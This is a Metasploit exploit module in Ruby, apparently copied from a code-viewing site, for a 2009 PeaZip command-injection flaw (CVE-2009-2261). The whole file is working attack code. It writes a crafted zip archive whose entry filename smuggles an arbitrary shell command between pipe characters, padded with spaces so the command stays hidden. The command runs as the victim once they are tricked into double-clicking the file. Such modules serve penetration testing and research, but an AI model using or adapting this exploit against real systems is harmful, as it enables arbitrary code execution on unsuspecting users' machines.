Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'rex/zip'
7

8
class MetasploitModule < Msf::Exploit::Remote
9
  Rank = ExcellentRanking
10

11
  include Msf::Exploit::FILEFORMAT
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'           => 'PeaZip Zip Processing Command Injection',
16
      'Description'    => %q{
17
          This module exploits a command injection vulnerability in PeaZip. All
18
        versions prior to 2.6.2 are suspected vulnerable. Testing was conducted with
19
        version 2.6.1 on Windows.
20

21
        In order for the command to be executed, an attacker must convince someone to
22
        open a specially crafted zip file with PeaZip, and access the specially file via
23
        double-clicking it. By doing so, an attacker can execute arbitrary commands
24
        as the victim user.
25
      },
26
      'License'        => MSF_LICENSE,
27
      'Author'         =>
28
        [
29
          'pyrokinesis', # Of Nine:Situations:Group
30
          'jduck'
31
        ],
32
      'References'     =>
33
        [
34
          [ 'CVE', '2009-2261' ],
35
          [ 'OSVDB', '54966' ],
36
          [ 'URL', 'http://peazip.sourceforge.net/' ],
37
          [ 'EDB', '8881' ]
38
        ],
39
      'Platform'       => %w{ linux unix win },
40
      'Arch'           => ARCH_CMD,
41
      'Payload'        =>
42
        {
43
          'Space'    => 1024,
44
          'BadChars' => '',
45
          'DisableNops' => true,
46
          'Compat'      =>
47
            {
48
              'PayloadType' => 'cmd',
49
              'RequiredCmd' => 'generic perl telnet',
50
            }
51
        },
52
      'Targets'        =>
53
        [
54
          ['Automatic', { }],
55
        ],
56
      'DisclosureDate' => '2009-06-05',
57
      'DefaultTarget'  => 0))
58

59
    register_options(
60
      [
61
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.zip']),
62
      ])
63
  end
64

65

66
  def exploit
67

68
    # NOTE: using a command line containing / or \ will result in the command
69
    # being easily visible to the victim
70
    cmd = datastore['CMD']
71

72
    fname = "README.TXT"
73
    rest = "\"|#{cmd}|.txt"
74
    fname << " " * (255 - fname.length - rest.length)
75
    fname << rest
76

77
    content = rand_text_alphanumeric(rand(1024))
78

79
    zip = Rex::Zip::Archive.new
80
    zip.add_file(fname, content)
81

82
    # Create the file
83
    print_status("Creating '#{datastore['FILENAME']}' file...")
84

85
    file_create(zip.pack)
86
  end
87
end
88

89